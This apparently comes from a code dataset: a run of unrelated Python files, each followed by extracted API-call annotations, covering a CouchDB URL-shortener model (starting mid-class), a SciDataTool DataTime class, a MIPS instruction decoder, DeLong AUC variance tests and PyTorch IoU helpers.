        return super(URL, cls).load(URL.db, id)

    @classmethod
    def query(cls, code):
        """Run the view/query identified by ``code`` on the bound database."""
        return URL.db.query(code)

    def store(self):
        """Persist the document, generating a unique short id when new.

        Fix: the old check ``getattr(self._data, "id", None)`` is always
        None for a dict-backed ``_data``, so already-stored documents were
        re-inserted under a fresh random id instead of being updated.
        """
        if self.id is None:
            new_id = self.shorty_id if self.shorty_id else None
            while 1:
                id = new_id if new_id else get_random_uid()
                try:
                    docid = URL.db.resource.put(
                        content=self._data, path="/%s/" % str(id)
                    )["id"]
                # Best-effort retry on id collisions / transient errors;
                # a requested shorty_id that keeps failing will loop, so
                # new_id stays user-controlled only for the first attempt.
                except Exception:
                    continue
                if docid:
                    break
            self._data = URL.db.get(docid)
        else:
            super(URL, self).store(URL.db)
        return self

    @property
    def short_url(self):
        """Absolute short URL for this document."""
        return url_for("link", uid=self.id, _external=True)

    def __repr__(self):
        return "<URL %r>" % self.id
| [
"couchdb.mapping.BooleanField",
"couchdb.mapping.TextField",
"datetime.datetime.utcnow"
] | [((287, 298), 'couchdb.mapping.TextField', 'TextField', ([], {}), '()\n', (296, 298), False, 'from couchdb.mapping import TextField\n'), ((312, 326), 'couchdb.mapping.BooleanField', 'BooleanField', ([], {}), '()\n', (324, 326), False, 'from couchdb.mapping import BooleanField\n'), ((396, 419), 'couchdb.mapping.TextField', 'TextField', ([], {'default': 'None'}), '(default=None)\n', (405, 419), False, 'from couchdb.mapping import TextField\n'), ((361, 378), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (376, 378), False, 'from datetime import datetime\n')] |
# -*- coding: utf-8 -*-
from os import linesep
from SciDataTool.Classes._check import set_array, check_init_dict, check_var, raise_
from SciDataTool.Functions.save import save
from SciDataTool.Classes.DataND import DataND
# Import all class method
# Try/catch to remove unnecessary dependencies in unused method
try:
from SciDataTool.Methods.DataTime.get_harmonics import get_harmonics
except ImportError as error:
get_harmonics = error
try:
from SciDataTool.Methods.DataTime.time_to_freq import time_to_freq
except ImportError as error:
time_to_freq = error
from numpy import array, array_equal
from SciDataTool.Classes._check import InitUnKnowClassError
from SciDataTool.Classes.Data import Data
class DataTime(DataND):
    """Class for physical quantities stored in the time/space domain"""

    VERSION = 1

    # Check ImportError to remove unnecessary dependencies in unused method
    # cf Methods.DataTime.get_harmonics
    if isinstance(get_harmonics, ImportError):
        # Import failed: expose a property that raises a helpful
        # ImportError only when the method is actually accessed.
        get_harmonics = property(
            fget=lambda x: raise_(
                ImportError(
                    "Can't use DataTime method get_harmonics: " + str(get_harmonics)
                )
            )
        )
    else:
        get_harmonics = get_harmonics
    # cf Methods.DataTime.time_to_freq
    if isinstance(time_to_freq, ImportError):
        time_to_freq = property(
            fget=lambda x: raise_(
                ImportError(
                    "Can't use DataTime method time_to_freq: " + str(time_to_freq)
                )
            )
        )
    else:
        time_to_freq = time_to_freq
    # save method is available in all object
    save = save

    def __init__(
        self,
        axes=None,
        normalizations=None,
        FTparameters=None,
        values=None,
        symbol="",
        name="",
        unit="",
        symmetries=None,
        init_dict=None,
    ):
        """Constructor of the class. Can be used in two ways :
        - __init__ (arg1 = 1, arg3 = 5) every parameter has a name and default value
            for Matrix, None will initialise the property with an empty Matrix
            for SciDataTool type, None will call the default constructor
        - __init__ (init_dict = d) d must be a dictionnary with every property as key
        ndarray or list can be given for Vector and Matrix
        object or dict can be given for SciDataTool Object

        Note: the dict parameters default to None instead of a literal
        ``{}`` to avoid the shared-mutable-default pitfall — a ``{}``
        default is a single dict object shared by every call, so mutating
        one instance's dict would silently affect all others.
        """
        # Replace the None sentinels with fresh, per-call dicts
        if normalizations is None:
            normalizations = {}
        if FTparameters is None:
            FTparameters = {}
        if symmetries is None:
            symmetries = {}
        if init_dict is not None:  # Initialisation by dict
            check_init_dict(
                init_dict,
                [
                    "axes",
                    "normalizations",
                    "FTparameters",
                    "values",
                    "symbol",
                    "name",
                    "unit",
                    "symmetries",
                ],
            )
            # Overwrite default value with init_dict content
            if "axes" in list(init_dict.keys()):
                axes = init_dict["axes"]
            if "normalizations" in list(init_dict.keys()):
                normalizations = init_dict["normalizations"]
            if "FTparameters" in list(init_dict.keys()):
                FTparameters = init_dict["FTparameters"]
            if "values" in list(init_dict.keys()):
                values = init_dict["values"]
            if "symbol" in list(init_dict.keys()):
                symbol = init_dict["symbol"]
            if "name" in list(init_dict.keys()):
                name = init_dict["name"]
            if "unit" in list(init_dict.keys()):
                unit = init_dict["unit"]
            if "symmetries" in list(init_dict.keys()):
                symmetries = init_dict["symmetries"]
        # Initialisation by argument
        # Call DataND init
        super(DataTime, self).__init__(
            axes=axes,
            normalizations=normalizations,
            FTparameters=FTparameters,
            values=values,
            symbol=symbol,
            name=name,
            unit=unit,
            symmetries=symmetries,
        )
        # The class is frozen (in DataND init), for now it's impossible to
        # add new properties

    def __str__(self):
        """Convert this object to a readable string (for print)"""
        DataTime_str = ""
        # Get the properties inherited from DataND
        DataTime_str += super(DataTime, self).__str__() + linesep
        return DataTime_str

    def __eq__(self, other):
        """Compare two objects (skip parent)"""
        if type(other) != type(self):
            return False
        # Check the properties inherited from DataND
        if not super(DataTime, self).__eq__(other):
            return False
        return True

    def as_dict(self):
        """Convert this object to a json serializable dict (can be used in __init__)"""
        # Get the properties inherited from DataND
        DataTime_dict = super(DataTime, self).as_dict()
        # The class name is added to the dict for deserialisation purpose
        # Overwrite the mother class name
        DataTime_dict["__class__"] = "DataTime"
        return DataTime_dict

    def _set_None(self):
        """Set all the properties to None (except SciDataTool object)"""
        # Set to None the properties inherited from DataND
        super(DataTime, self)._set_None()
| [
"SciDataTool.Classes._check.check_init_dict"
] | [((2494, 2618), 'SciDataTool.Classes._check.check_init_dict', 'check_init_dict', (['init_dict', "['axes', 'normalizations', 'FTparameters', 'values', 'symbol', 'name',\n 'unit', 'symmetries']"], {}), "(init_dict, ['axes', 'normalizations', 'FTparameters',\n 'values', 'symbol', 'name', 'unit', 'symmetries'])\n", (2509, 2618), False, 'from SciDataTool.Classes._check import set_array, check_init_dict, check_var, raise_\n')] |
"""
Created on Sun Feb 12 11:51:29 2017
@author: <NAME>
Class: Computer Architecture
Language Python 2.7
Input an array of hex-instructions, and return a of decoded MIPS instructions (e.g. 7a078 ADD $2, $9, $8).
Instruction types de-constructed in this assignment are ADD, AND, OR, SLT, SUB, BEQ, BNE, LW, and SW.
"""
import numpy as np
# The eleven 32-bit MIPS machine words this script disassembles.
hex_instructions = [0x022da822, 0x8ef30018, 0x12a70004, 0x02689820,
                    0xad930018, 0x02697824, 0xad8ffff4, 0x018c6020,
                    0x02a4a825, 0x158ffff6, 0x8ef9fff0]
# Vectorize hex_instructions as a numpy array so it can be printed in hex format
A = np.array(hex_instructions)
vhex = np.vectorize(hex)  # element-wise hex() for pretty-printing the array
# funct-code -> mnemonic for R-type instructions (opcode 0).
_R_TYPE_FUNCTS = {
    0b100000: "ADD",
    0b100010: "SUB",
    0b100100: "AND",
    0b100101: "OR",
    0b101010: "SLT",
}
# opcode -> mnemonic for the I-type instructions this decoder supports.
_BRANCH_OPCODES = {0b000100: "BEQ", 0b000101: "BNE"}
_MEMORY_OPCODES = {0b100011: "LW", 0b101011: "SW"}
# Address of the first decoded instruction (same base as the original:
# it started at 0x7a05c and pre-incremented by 4 before each decode).
_BASE_ADDRESS = 0x7A060


def _sign_extend_16(value):
    """Interpret *value* as a signed 16-bit two's-complement integer."""
    return value - 0x10000 if value & 0x8000 else value


def _decode_one(word, address):
    """Decode one 32-bit MIPS machine *word* located at *address*.

    Returns a string of the form ``"<addr>: <OP> ..."`` mirroring the
    formats the original script attempted to build.
    """
    opcode = (word >> 26) & 0x3F
    rs = (word >> 21) & 0x1F
    rt = (word >> 16) & 0x1F
    rd = (word >> 11) & 0x1F
    funct = word & 0x3F
    imm = _sign_extend_16(word & 0xFFFF)
    if opcode == 0 and funct in _R_TYPE_FUNCTS:
        return "{:x}: {} ${}, ${}, ${}".format(
            address, _R_TYPE_FUNCTS[funct], rd, rs, rt
        )
    if opcode in _BRANCH_OPCODES:
        # MIPS branch target: PC of the *next* instruction plus offset*4.
        target = address + 4 + imm * 4
        return "{:x}: {} ${}, ${}, {:x}".format(
            address, _BRANCH_OPCODES[opcode], rs, rt, target
        )
    if opcode in _MEMORY_OPCODES:
        return "{:x}: {} ${}, {}(${})".format(
            address, _MEMORY_OPCODES[opcode], rt, imm, rs
        )
    return "{:x}: <unknown opcode {:#08b}>".format(address, opcode)


def deconstruct(x):
    """Decode a list of 32-bit MIPS machine words, print and return them.

    Fixes over the original implementation:
    - iterates the *x* parameter instead of the module-level global;
    - sign-extends 16-bit immediates arithmetically (the old code
      subscripted an ``int`` and crashed with TypeError on branches);
    - computes BNE targets before use (previously referenced
      ``new_address`` before assignment);
    - uses Python 3 ``print()`` calls (the old bare ``print`` statements
      printed blank lines and discarded the message strings).

    Parameters
    ----------
    x : iterable of int
        32-bit MIPS machine words, first word assumed at 0x7a060.

    Returns
    -------
    list of str
        The decoded instructions (also printed), e.g.
        ``"7a060: SUB $21, $17, $13"``.  Backward compatible: the
        original returned None, which no caller used.
    """
    decoded = []
    address = _BASE_ADDRESS
    for word in x:
        decoded.append(_decode_one(word, address))
        address += 4  # branches are assumed not taken, as before
    print("The deconstructed MIPS instructions are:")
    print("---------------------------------------------------------------------")
    for line in decoded:
        print(line)
    return decoded
# Calling the function on the hex_instructions list will execute the defined program.
deconstruct(hex_instructions) | [
"numpy.array",
"numpy.vectorize"
] | [((642, 668), 'numpy.array', 'np.array', (['hex_instructions'], {}), '(hex_instructions)\n', (650, 668), True, 'import numpy as np\n'), ((677, 694), 'numpy.vectorize', 'np.vectorize', (['hex'], {}), '(hex)\n', (689, 694), True, 'import numpy as np\n')] |
import sklearn.datasets
import sklearn.model_selection
import sklearn.linear_model
import numpy
import compare_auc_delong_xu
import unittest
import scipy.stats
class TestIris(unittest.TestCase):
    """Check the DeLong variance routine on Iris against sklearn's AUC.

    NOTE(review): ``sklearn.metrics`` is used below but only the
    datasets/model_selection/linear_model submodules are imported at the
    top of the file — this relies on sklearn importing metrics as a side
    effect; confirm against the installed sklearn version.
    """

    @classmethod
    def setUpClass(cls):
        data = sklearn.datasets.load_iris()
        # Binary task: class 1 vs. rest.  Fix: the ``numpy.int`` alias was
        # removed in NumPy 1.20 — use the builtin ``int`` instead.
        x_train, x_test, y_train, cls.y_test = sklearn.model_selection.train_test_split(
            data.data, (data.target == 1).astype(int), test_size=0.8, random_state=42)
        cls.predictions = sklearn.linear_model.LogisticRegression(solver="lbfgs").fit(
            x_train, y_train).predict_proba(x_test)[:, 1]
        cls.sklearn_auc = sklearn.metrics.roc_auc_score(cls.y_test, cls.predictions)

    def test_variance_const(self):
        """AUC must match sklearn's and the variance its known constant."""
        auc, variance = compare_auc_delong_xu.delong_roc_variance(self.y_test, self.predictions)
        numpy.testing.assert_allclose(self.sklearn_auc, auc)
        numpy.testing.assert_allclose(0.0015359814789736538, variance)
class TestGauss(unittest.TestCase):
    """Monte-Carlo check of the DeLong variance under a binormal model."""

    # Positive-class scores ~ N(0.5, 1); negative-class scores ~ N(-0.5, 1).
    x_distr = scipy.stats.norm(0.5, 1)
    y_distr = scipy.stats.norm(-0.5, 1)

    def test_variance(self):
        """Mean DeLong variance should approximate the empirical AUC variance."""
        sample_size_x = 7
        sample_size_y = 14
        n_trials = 50000
        aucs = numpy.empty(n_trials)
        variances = numpy.empty(n_trials)
        numpy.random.seed(1234235)  # fixed seed for reproducibility
        labels = numpy.concatenate([numpy.ones(sample_size_x), numpy.zeros(sample_size_y)])
        for trial in range(n_trials):
            scores = numpy.concatenate([
                self.x_distr.rvs(sample_size_x),
                self.y_distr.rvs(sample_size_y)])
            aucs[trial] = sklearn.metrics.roc_auc_score(labels, scores)
            auc_delong, variances[trial] = compare_auc_delong_xu.delong_roc_variance(
                labels, scores)
            # DeLong's AUC estimate must agree with sklearn's on every trial.
            numpy.testing.assert_allclose(aucs[trial], auc_delong)
        # rtol=0.1: the two variance estimates agree only statistically.
        numpy.testing.assert_allclose(variances.mean(), aucs.var(), rtol=0.1)
| [
"numpy.ones",
"numpy.testing.assert_allclose",
"compare_auc_delong_xu.delong_roc_variance",
"numpy.zeros",
"numpy.empty",
"numpy.random.seed"
] | [((758, 830), 'compare_auc_delong_xu.delong_roc_variance', 'compare_auc_delong_xu.delong_roc_variance', (['self.y_test', 'self.predictions'], {}), '(self.y_test, self.predictions)\n', (799, 830), False, 'import compare_auc_delong_xu\n'), ((839, 891), 'numpy.testing.assert_allclose', 'numpy.testing.assert_allclose', (['self.sklearn_auc', 'auc'], {}), '(self.sklearn_auc, auc)\n', (868, 891), False, 'import numpy\n'), ((900, 962), 'numpy.testing.assert_allclose', 'numpy.testing.assert_allclose', (['(0.0015359814789736538)', 'variance'], {}), '(0.0015359814789736538, variance)\n', (929, 962), False, 'import numpy\n'), ((1203, 1224), 'numpy.empty', 'numpy.empty', (['n_trials'], {}), '(n_trials)\n', (1214, 1224), False, 'import numpy\n'), ((1245, 1266), 'numpy.empty', 'numpy.empty', (['n_trials'], {}), '(n_trials)\n', (1256, 1266), False, 'import numpy\n'), ((1275, 1301), 'numpy.random.seed', 'numpy.random.seed', (['(1234235)'], {}), '(1234235)\n', (1292, 1301), False, 'import numpy\n'), ((1687, 1744), 'compare_auc_delong_xu.delong_roc_variance', 'compare_auc_delong_xu.delong_roc_variance', (['labels', 'scores'], {}), '(labels, scores)\n', (1728, 1744), False, 'import compare_auc_delong_xu\n'), ((1774, 1828), 'numpy.testing.assert_allclose', 'numpy.testing.assert_allclose', (['aucs[trial]', 'auc_delong'], {}), '(aucs[trial], auc_delong)\n', (1803, 1828), False, 'import numpy\n'), ((1338, 1363), 'numpy.ones', 'numpy.ones', (['sample_size_x'], {}), '(sample_size_x)\n', (1348, 1363), False, 'import numpy\n'), ((1365, 1391), 'numpy.zeros', 'numpy.zeros', (['sample_size_y'], {}), '(sample_size_y)\n', (1376, 1391), False, 'import numpy\n')] |
import torch
def confusion_matrix(preds, labels, num_classes):
    """Build a (num_classes x num_classes) confusion matrix.

    Row index is the ground-truth label, column index the prediction;
    the result is returned as a float tensor.
    """
    flat_index = num_classes * labels + preds
    counts = torch.bincount(flat_index, minlength=num_classes ** 2)
    return counts.reshape(num_classes, num_classes).float()
def compute_IoU_from_cmatrix(hist, ignore_index=None):
    """Computes the Intersection over Union (IoU).

    Args:
        hist: (C, C) confusion matrix (rows = ground truth, cols = prediction).
        ignore_index: optional class index excluded from the per-class and
            mean IoU (its row is zeroed before computing the scores).
    Returns:
        m_IoU, fw_IoU, and matrix IoU
    """
    if ignore_index is not None:
        # Fix: work on a copy — the original zeroed the caller's tensor
        # in place, silently corrupting it for any later use.
        hist = hist.clone()
        hist[ignore_index] = 0.0
    intersection = torch.diag(hist)
    union = hist.sum(dim=1) + hist.sum(dim=0) - intersection
    IoU = intersection.float() / union.float()
    # Classes absent from both prediction and ground truth count as perfect.
    IoU[union == 0] = 1.0
    if ignore_index is not None:
        IoU = torch.cat((IoU[:ignore_index], IoU[ignore_index + 1:]))
    m_IoU = torch.mean(IoU).item()
    # sum(union_c) over classes equals 2*sum(hist) - sum(intersection).
    fw_IoU = (
        torch.sum(intersection) / (2 * torch.sum(hist) - torch.sum(intersection))
    ).item()
    return m_IoU, fw_IoU, IoU
def compute_IoU(preds, labels, num_classes, ignore_index=None):
    """Computes the Intersection over Union (IoU).

    Convenience wrapper: builds the confusion matrix for the given
    predictions/labels, then derives the IoU scores from it.
    """
    cmatrix = confusion_matrix(preds, labels, num_classes)
    return compute_IoU_from_cmatrix(cmatrix, ignore_index)
| [
"torch.bincount",
"torch.mean",
"torch.sum",
"torch.diag",
"torch.cat"
] | [((570, 586), 'torch.diag', 'torch.diag', (['hist'], {}), '(hist)\n', (580, 586), False, 'import torch\n'), ((768, 823), 'torch.cat', 'torch.cat', (['(IoU[:ignore_index], IoU[ignore_index + 1:])'], {}), '((IoU[:ignore_index], IoU[ignore_index + 1:]))\n', (777, 823), False, 'import torch\n'), ((834, 849), 'torch.mean', 'torch.mean', (['IoU'], {}), '(IoU)\n', (844, 849), False, 'import torch\n'), ((880, 903), 'torch.sum', 'torch.sum', (['intersection'], {}), '(intersection)\n', (889, 903), False, 'import torch\n'), ((86, 158), 'torch.bincount', 'torch.bincount', (['(num_classes * labels + preds)'], {'minlength': '(num_classes ** 2)'}), '(num_classes * labels + preds, minlength=num_classes ** 2)\n', (100, 158), False, 'import torch\n'), ((929, 952), 'torch.sum', 'torch.sum', (['intersection'], {}), '(intersection)\n', (938, 952), False, 'import torch\n'), ((911, 926), 'torch.sum', 'torch.sum', (['hist'], {}), '(hist)\n', (920, 926), False, 'import torch\n')] |